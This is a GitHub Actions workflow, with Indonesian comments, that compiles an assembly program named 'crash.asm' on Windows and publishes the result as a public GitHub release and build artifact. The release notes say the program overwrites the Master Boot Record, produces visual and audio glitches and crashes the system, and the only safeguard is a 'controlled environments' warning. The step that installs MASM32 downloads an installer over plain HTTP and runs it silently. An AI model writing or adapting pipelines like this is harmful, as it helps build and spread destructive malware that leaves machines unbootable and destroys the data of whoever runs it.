name: Build and Release Crash System

on:
  push:
    tags:
      - 'v*'  # Trigger pada push tag yang dimulai dengan 'v'
  workflow_dispatch:  # Memungkinkan trigger manual

jobs:
  build-and-release:
    runs-on: windows-latest

    steps:
    - name: Checkout code
      uses: actions/checkout@v3
      with:
        fetch-depth: 0

    - name: Setup MASM32
      run: |
        # Download dan install MASM32
        Invoke-WebRequest -Uri "http://www.masm32.com/masmdl.exe" -OutFile "masmdl.exe"
        Start-Process -Wait -FilePath "masmdl.exe" -ArgumentList "/silent"
        echo "MASM32_PATH=C:\masm32" | Out-File -FilePath $env:GITHUB_ENV -Encoding utf8 -Append
        echo "C:\masm32\bin" | Out-File -FilePath $env:GITHUB_PATH -Encoding utf8 -Append

    - name: Compile ASM code
      run: |
        ml /c /coff crash.asm
        link /subsystem:windows crash.obj

    - name: Create version info
      id: version
      run: |
        # Ekstrak versi dari tag (format vX.Y.Z)
        $tag = "${{ github.ref_name }}"
        $version = $tag.TrimStart('v')
        echo "VERSION=$version" | Out-File -FilePath $env:GITHUB_ENV -Encoding utf8 -Append
        echo "version=$version" >> $env:GITHUB_OUTPUT

    - name: Rename binary with version
      run: |
        Move-Item -Path crash.exe -Destination "crash-${{ env.VERSION }}.exe"

    - name: Create release
      uses: softprops/action-gh-release@v1
      with:
        tag_name: ${{ github.ref }}
        name: Crash System ${{ env.VERSION }}
        body: |
           **WARNING: DESTRUCTIVE SOFTWARE** 
          
          This release contains highly destructive code that will:
          - Create visual and audio glitches
          - Overwrite the Master Boot Record (MBR)
          - Cause system crash and instability
          
          **ONLY USE IN CONTROLLED ENVIRONMENTS**
          
          Version: ${{ env.VERSION }}
          Build date: ${{ github.event.head_commit.timestamp }}
        files: |
          crash-${{ env.VERSION }}.exe
          README.md
        draft: false
        prerelease: false

    - name: Upload build artifact
      uses: actions/upload-artifact@v3
      with:
        name: crash-system-${{ env.VERSION }}
        path: |
          crash-${{ env.VERSION }}.exe
          crash.asm
